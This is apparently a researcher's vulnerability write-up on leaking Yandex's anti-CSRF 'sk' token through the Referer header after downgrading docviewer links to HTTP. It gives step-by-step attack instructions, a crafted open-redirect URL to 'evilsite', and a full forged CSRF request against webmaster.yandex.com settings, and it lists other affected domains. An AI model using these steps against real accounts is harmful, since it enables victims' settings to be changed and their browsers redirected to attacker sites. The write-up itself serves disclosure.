When you browse a link in docviewer.yandex.com, The site will recreate a token named sk, which is used to validate a redirection and anti-csrf token. sk is also an anti-CSRF token on http://webmaster.yandex.ru, https://docviewer.yandex.com/r.xml. now If the attacker knows the value of your sk token, he can make a redirection and CSRF attack. How to know the token of the victim ???. Because http://docviewer.yandex.com/r.xml?sk=thecsrftokenofvictim&url=evilsite useD GET request, the params are showed in URL and it also changeable to https to HTTP. as a result, you can use REFERER HEADER to get the token.

HACK STEPS

  • Upload a document with link or a hyperlink. that hyperlink is the attacker’s site..
  • Select the file, Share the link using the share button then get the link
  • Browse that link, Then click the view button you will redirect to docviewer.yandex.com
  • Change the https to http to allow us to see the referer in our site.
 
https://docviewer.yandex.com/?url=ya-disk-public://nhP6POxtEi4v9wDffRyOFHbGQgIOhlsEbLhl3zH9c7k%3D&name=testxxx.odt to http://docviewer.yandex.com/?url=ya-disk-public://nhP6POxtEi4v9wDffRyOFHbGQgIOhlsEbLhl3zH9c7k%3D&name=testxxx.odt
  • Send the url to victim and induce him to click the link for attacker’site to able to leak the anti-CSRF token.

now you have his sk token! that is the bypass!

for redirection

 
 https://docviewer.yandex.com/r.xml?sk=thecsrftokenofvictim&url=evilsite
 

for csrf

http://webmaster.yandex.com/settings/messages/types.xml?email_1=EMAIL&email_2=EMAIL&message_3=MESSAGE&email_3=EMAIL&message_4=MESSAGE&percent=50&message_5=MESSAGE&message_6=MESSAGE&message_7=MESSAGE&message_8=MESSAGE&email_8=EMAIL&message_9=MESSAGE&message_10=MESSAGE&message_12=MESSAGE&message_17=MESSAGE&message_18=MESSAGE&message_19=MESSAGE&email_19=EMAIL&message_21=MESSAGE&email_21=EMAIL&message_22=MESSAGE&email_22=EMAIL&message_32=MESSAGE&do=save&sk=TOKENOFVICTIM

This is wide CSRF attack which affect other Yandex domain.

list of affected Yandex domain

  • http://appmetrica.yandex.com/
  • https://calendar.yandex.ru
  • https://disk.yandex.com/
  • docviewer.yandex.com
  • m.contact.yandex.com.tr & etc

NOTE: i used javascript code to get the leaked csrf token on refrerer header and append it to my CSRF PoC.